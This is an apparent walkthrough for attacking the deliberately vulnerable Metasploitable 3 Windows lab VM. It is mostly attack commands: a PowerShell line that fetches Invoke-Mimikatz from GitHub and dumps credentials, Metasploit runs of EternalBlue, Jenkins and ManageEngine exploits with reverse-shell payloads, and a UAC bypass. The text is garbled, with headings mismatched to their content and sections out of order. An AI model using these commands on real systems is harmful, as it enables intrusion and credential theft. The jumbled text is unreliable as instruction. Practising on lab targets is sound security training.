Metasploitable 3 Windows Walkthrough Guide

Reports and walkthroughs for this target generally follow these key phases:

1. Reconnaissance and Information Gathering

Metasploitable 3 Windows comes pre-configured with a wide range of deliberate security vulnerabilities spanning multiple categories.

Tools like the Metasploit Framework include modules that check whether a service allows remote command execution when valid administrative credentials are supplied.

This method involves the original, manual build process using the command line. It's the best way to understand how the VM is constructed.

# Download Mimikatz
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds

Unquoted service paths can be exploited when a service executable path contains spaces and is not enclosed in quotes. Windows then searches for the executable in unexpected directories, potentially allowing an attacker to place a malicious executable that is run with SYSTEM privileges.

The Jenkins Script Console allows execution of arbitrary Groovy script on the server. Use a Groovy payload to execute a reverse shell command.

Known Remote Code Execution (RCE) vulnerabilities.

3. Exploitation Walkthroughs

Path A: SMB EternalBlue (Port 445)

msf6 > use exploit/multi/http/jenkins_script_console
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8585
msf6 > set TARGETURI /
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp   # if target is Windows, use windows/x64/meterpreter/reverse_tcp
msf6 > exploit

msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.56.102
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.56.101
msf6 > exploit

msf6 > use exploit/windows/http/manageengine_desktop_central_rce
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set RHOST 10.0.2.6
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LHOST 10.0.2.15
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LPORT 4444
msf6 exploit(windows/http/manageengine_desktop_central_rce) > run

use exploit/windows/local/bypassuac_dotnet_profiler
set SESSION
exploit

5. Post-Exploitation and Flag Retrieval

Perform a comprehensive scan to identify open ports and services using nmap.

nmap -p- -sV -A 192.168.x.x

80/443 : HTTP/HTTPS (IIS 7.5, PHP applications)
445/139 : SMB/NetBIOS (File sharing)
3389 : Remote Desktop (RDP)
5985 : Windows Remote Management (WinRM)
8080 : Apache Tomcat

Part 3: Exploitation Scenarios (Walkthrough)

use exploit/windows/http/manageengine_connection_id_write

Set your RHOSTS and LHOST, then run exploit to gain a shell.

3. SMB and Internal Services

Within your Meterpreter session, check your current privileges:

getuid
getprivs

Exploit Suggestion Engine
